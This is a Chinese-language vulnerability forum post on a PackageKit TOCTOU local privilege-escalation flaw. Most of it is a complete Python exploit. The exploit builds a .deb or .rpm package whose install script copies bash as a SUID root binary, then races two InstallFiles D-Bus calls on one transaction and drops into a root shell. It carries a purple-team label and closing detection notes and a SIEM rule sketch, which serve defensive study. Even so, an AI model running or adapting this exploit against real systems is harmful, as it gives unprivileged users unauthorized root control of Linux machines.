CVE-2026-41651 Linux PackageKit TOCTOU本地提权漏洞 - 💉 漏洞库极核论坛 - 知识星球 - 极核GetShell

CVE-2026-41651 Linux PackageKit TOCTOU本地提权漏洞

0x00 前言

PackageKit是一套自由且开源的应用软件套装。它的核心组件包括守护进程packagekitd和交互库libpackagekit-glib2-18。在设计上,PackageKit通过守护进程抽象不同系统的差异,不取代已有的软件包管理系统,而是与之协同工作,支持从本机文件、套装媒体或远程资源安装软件,借助Polkit获取权限,具备多用户系统感知能力,闲置时可自动关闭。

它拥有pkcon命令行等多种前端,能适配YUM、APT、Pacman等多种后端包管理系统,实现跨发行版的软件包安装、更新、卸载及依赖管理等操作。

 

0x01 漏洞描述

该漏洞的核心是一个CWE-367 TOCTOU(Time-of-check Time-of-use)竞态条件:在同一个D-Bus transaction对象上,攻击者可以先调用一个不需要 polkit认证的查询操作(如 GetPackages),使transaction直接进入 READY→RUNNING状态并排队等待后端执行。紧接着在同一transaction上调用特权操作(如InstallPackages),覆写transaction内部缓存的操作类型(role)和参数(package_ids)。由于GLib的事件优先级和pk_transaction_run() 缺少状态校验,后端最终以被篡改后的特权操作参数执行。

 

0x02 影响版本

PackageKit 0.8.1 ~ 1.3.4(几乎所有 Linux 桌面发行版默认安装)

 

0x03 漏洞详情

GitHub地址:https://github.com/baph00met/CVE-2026-41651

POC文件:

#!/usr/bin/env python3
"""
CVE-2026-41651 - PackageKit TOCTOU Privilege Escalation
Purple Team Test Case | FOR AUTHORIZED USE ON TEST SYSTEMS ONLY

Vulnerability: TOCTOU race in PackageKit's D-Bus transaction handling.
A client can call InstallFiles twice on the same transaction — once with
FLAG_SIMULATE (triggering authorization) and immediately again with FLAG_NONE
(real install) before the auth check resolves. The second call's payload
executes with root privileges.

Fix: PackageKit 1.3.5 (commit 76cfb675) — state guard in pk-transaction.c
     rejects re-invocation of action methods after PK_TRANSACTION_STATE_NEW.

Supports: Debian/Ubuntu (dpkg-deb) and RHEL/Fedora/SUSE (rpmbuild)
Requires: python3-gi (GObject introspection bindings)

Hardening notes:
  - Explicit 0o755/0o644 chmod on all build artifacts overrides restrictive umask
    (e.g. 027/077) that would otherwise make build trees unreadable to dpkg-deb/rpmbuild.
  - SUID drop directory is resolved at runtime by probing /proc/mounts for nosuid/noexec
    flags. Candidates tried in order: /var/tmp, /dev/shm, /tmp, $HOME.
"""

import os
import sys
import shutil
import subprocess
import time
from pathlib import Path

try:
    from gi.repository import Gio, GLib
except ImportError:
    sys.exit("[-] Missing python3-gi. Install: apt install python3-gi  OR  dnf install python3-gobject")

# ── Config ───────────────────────────────────────────────────────────────────

SUID_FILENAME = ".suid_bash"            # resolved into a writable, suid/exec-capable dir at runtime
PK_BUS        = "org.freedesktop.PackageKit"
PK_OBJ      = "/org/freedesktop/PackageKit"
PK_IFACE    = "org.freedesktop.PackageKit"
TX_IFACE    = "org.freedesktop.PackageKit.Transaction"
POLL_SECS   = 90

FLAG_SIMULATE = 4   # PK_TRANSACTION_FLAG_SIMULATE — triggers auth but does not install
FLAG_NONE     = 0   # No flags — real install

# ── Mount-flag helpers ────────────────────────────────────────────────────────

def _mount_flags(path: str) -> set:
    """Return the mount option set for the filesystem that owns *path*."""
    path = os.path.realpath(path)
    best, flags = "", set()
    try:
        with open("/proc/mounts") as fh:
            for line in fh:
                parts = line.split()
                if len(parts) < 4:
                    continue
                mnt = parts[1]
                if path.startswith(mnt) and len(mnt) > len(best):
                    best  = mnt
                    flags = set(parts[3].split(","))
    except OSError:
        pass
    return flags


def _find_suid_dir() -> str:
    """
    Return the first candidate directory that is writable and whose filesystem
    is mounted without 'nosuid' or 'noexec'.  Both flags must be absent:
      - nosuid  → SUID bit silently ignored, shell never becomes root
      - noexec  → binary cannot be executed at all
    Candidates are tried in preference order.
    """
    candidates = ["/var/tmp", "/dev/shm", "/tmp", os.path.expanduser("~")]
    for d in candidates:
        if not os.path.isdir(d) or not os.access(d, os.W_OK):
            continue
        flags = _mount_flags(d)
        if "nosuid" not in flags and "noexec" not in flags:
            return d
    sys.exit(
        "[-] No writable directory found that supports SUID + exec.\n"
        "    Tried: " + ", ".join(candidates)
    )


# ── Package builders ─────────────────────────────────────────────────────────

def _detect_pkg_mgr():
    if shutil.which("dpkg-deb"):
        return "deb"
    if shutil.which("rpmbuild"):
        return "rpm"
    sys.exit("[-] No supported package builder found (need dpkg-deb or rpmbuild)")


def _build_deb(out_path: str, pkg_name: str, postinst: str = None):
    build = Path(f"/tmp/pkbuild_{pkg_name}")
    deb   = build / "DEBIAN"
    deb.mkdir(parents=True, exist_ok=True)

    # Explicit permissions — overrides restrictive umask (e.g. 027/077) that
    # would leave directories as 750/700, making them unreadable to dpkg-deb.
    build.chmod(0o755)
    deb.chmod(0o755)

    ctrl = deb / "control"
    ctrl.write_text(
        f"Package: {pkg_name}\nVersion: 1.0\nArchitecture: all\n"
        f"Maintainer: purple-team\nDescription: CVE-2026-41651 test package\n"
    )
    ctrl.chmod(0o644)

    if postinst:
        pi = deb / "postinst"
        pi.write_text(f"#!/bin/sh\n{postinst}\n")
        pi.chmod(0o755)

    subprocess.run(
        ["dpkg-deb", "-b", str(build), out_path],
        check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
    )
    shutil.rmtree(build, ignore_errors=True)


def _build_rpm(out_dir: str, pkg_name: str, post_script: str = None) -> str:
    topdir = Path(f"/tmp/rpmbuild_{pkg_name}")
    for sub in ("BUILD", "RPMS", "SOURCES", "SPECS", "SRPMS"):
        d = topdir / sub
        d.mkdir(parents=True, exist_ok=True)
        # Explicit 0o755 — same umask rationale as _build_deb; rpmbuild must be
        # able to traverse every subdirectory of _topdir.
        d.chmod(0o755)
    topdir.chmod(0o755)

    post_section = f"%post\n{post_script}\n" if post_script else ""
    spec_text = f"""%global _topdir {topdir}
Name:        {pkg_name}
Version:     1.0
Release:     1
Summary:     CVE-2026-41651 test package
License:     MIT
BuildArch:   noarch

%description
Purple team test package for CVE-2026-41651.

{post_section}
%files
"""
    spec_path = topdir / "SPECS" / f"{pkg_name}.spec"
    spec_path.write_text(spec_text)
    spec_path.chmod(0o644)

    subprocess.run(
        ["rpmbuild", "--define", f"_topdir {topdir}", "-bb", str(spec_path)],
        check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
    )

    rpms = list((topdir / "RPMS").rglob("*.rpm"))
    if not rpms:
        sys.exit(f"[-] rpmbuild produced no output for {pkg_name}")

    dest = os.path.join(out_dir, f"{pkg_name}.rpm")
    shutil.copy2(str(rpms[0]), dest)
    shutil.rmtree(topdir, ignore_errors=True)
    return dest


def build_packages(pkg_mgr: str, suid_path: str):
    pid            = os.getpid()
    payload_script = f"install -m 4755 /bin/bash {suid_path}"

    if pkg_mgr == "deb":
        dummy   = f"/tmp/pk-dummy-{pid}.deb"
        payload = f"/tmp/pk-payload-{pid}.deb"
        _build_deb(dummy,   f"pk-dummy-{pid}")
        _build_deb(payload, f"pk-payload-{pid}", postinst=payload_script)
    else:
        dummy   = _build_rpm("/tmp", f"pk-dummy-{pid}")
        payload = _build_rpm("/tmp", f"pk-payload-{pid}", post_script=payload_script)

    return dummy, payload

# ── D-Bus / exploit logic ─────────────────────────────────────────────────────

def create_transaction(conn) -> str:
    res = conn.call_sync(
        PK_BUS, PK_OBJ, PK_IFACE, "CreateTransaction",
        None, GLib.VariantType("(o)"),
        Gio.DBusCallFlags.NONE, -1, None
    )
    return res.unpack()[0]


def fire_race(conn, tid: str, dummy: str, payload: str):
    """
    Send both InstallFiles calls on the same transaction object without waiting.

    Call 1 — FLAG_SIMULATE (4): PackageKit queues an authorization check for
              installing <dummy>. No install occurs yet.
    Call 2 — FLAG_NONE (0): Re-invokes InstallFiles on the same transaction
              with the real payload before the auth check resolves.  On
              vulnerable versions the state guard is absent, so the second
              call overwrites the queued parameters; when polkit grants auth
              the payload executes instead of the dummy.
    """
    conn.call(
        PK_BUS, tid, TX_IFACE, "InstallFiles",
        GLib.Variant("(tas)", (FLAG_SIMULATE, [dummy])),
        None, Gio.DBusCallFlags.NONE, -1, None, None
    )
    conn.call(
        PK_BUS, tid, TX_IFACE, "InstallFiles",
        GLib.Variant("(tas)", (FLAG_NONE, [payload])),
        None, Gio.DBusCallFlags.NONE, -1, None, None
    )
    conn.flush_sync(None)


def poll_suid(path: str, timeout: int) -> bool:
    print(f"[*] Polling for SUID at {path} ({timeout}s max)...")
    for _ in range(timeout):
        try:
            st = os.stat(path)
            if st.st_mode & 0o4000 and st.st_uid == 0:
                print(f"\n[+] Confirmed: {path} is SUID root (mode={oct(st.st_mode)})")
                return True
        except FileNotFoundError:
            pass
        print(".", end="", flush=True)
        time.sleep(1)
    print()
    return False

# ── Main ──────────────────────────────────────────────────────────────────────

def main():
    print("=" * 60)
    print("  CVE-2026-41651 — PackageKit TOCTOU LPE")
    print("  Purple Team Test Case | Authorized Use Only")
    print("=" * 60)
    print()

    if os.geteuid() == 0:
        sys.exit("[-] Must be run as an unprivileged user to demonstrate the bug")

    # Override any restrictive umask before creating build trees.
    # Without this, mkdir() may produce 750/700 dirs that dpkg-deb/rpmbuild
    # cannot traverse.  Explicit chmod calls in the builders are the primary
    # fix; this is a belt-and-suspenders safety net.
    os.umask(0o022)

    suid_dir  = _find_suid_dir()
    suid_path = os.path.join(suid_dir, SUID_FILENAME)
    print(f"[+] SUID drop directory: {suid_dir}  (no nosuid/noexec)")

    pkg_mgr = _detect_pkg_mgr()
    print(f"[+] Package format: {pkg_mgr.upper()}")

    print("[*] Building test packages...")
    dummy_path, payload_path = build_packages(pkg_mgr, suid_path)
    print(f"[+] Dummy pkg:   {dummy_path}")
    print(f"[+] Payload pkg: {payload_path}")
    print(f"[+] Payload installs SUID bash to: {suid_path}")
    print()

    print("[*] Connecting to system D-Bus...")
    conn = Gio.bus_get_sync(Gio.BusType.SYSTEM, None)

    print("[*] Creating PackageKit transaction...")
    tid = create_transaction(conn)
    print(f"[+] Transaction ID: {tid}")
    print()

    print("[*] Firing TOCTOU race (SIMULATE → REAL on same transaction)...")
    fire_race(conn, tid, dummy_path, payload_path)

    success = poll_suid(suid_path, POLL_SECS)

    # Cleanup packages regardless of outcome
    for p in (dummy_path, payload_path):
        try:
            os.unlink(p)
        except OSError:
            pass

    if not success:
        print("[-] Exploit window missed — system may be patched or timing was unfavorable")
        print("[-] Note: this race is non-deterministic; retry if system is confirmed vulnerable")
        print(f"[-] Check PackageKit version: pkcon backend-details")
        sys.exit(1)

    print()
    print("[+] Dropping to root shell via SUID bash (-p preserves effective UID=0)")
    print("[+] --- ROOT SHELL FOLLOWS ---")
    print()
    os.execl(suid_path, suid_path, "-p")


# ── Detection artifacts (for the Blue side) ───────────────────────────────────
#
# Indicators defenders should look for:
#
#  D-Bus:
#   - Multiple rapid InstallFiles calls on the same transaction object path
#   - FLAG_SIMULATE (4) call immediately followed by FLAG_NONE (0) on same tid
#   - Audit rule: -w /usr/share/dbus-1/ -p wa
#
#  File system:
#   - Creation of SUID root binary in /tmp (mode 04755, owner root)
#   - dpkg-deb / rpmbuild invoked by non-root, non-package-manager process
#   - Transient .deb/.rpm files created in /tmp by unprivileged user
#
#  Process:
#   - bash process with UID != EUID (SUID execution)
#   - PackageKit (packagekitd) running postinst/post scripts from /tmp packages
#
#  Audit / syslog:
#   - packagekitd executing /bin/sh from a %post or postinst originating in /tmp
#   - polkit granting org.freedesktop.packagekit.package-install to local user
#     for a package not sourced from a trusted repository
#
# SIEM rule sketch (pseudo):
#   event.type == "process_start"
#   AND process.parent.name == "packagekitd"
#   AND process.name == "sh"
#   AND process.args matches "/tmp/*"

if __name__ == "__main__":
    main()

 

0x04 利用截图

微信图片_2026-05-11_111457_577

 

0x05 参考链接

GitHub地址:https://github.com/PackageKit/PackageKit/security/advisories/GHSA-f55j-vvr9-69xv

 

 

请登录后发表评论

    没有回复内容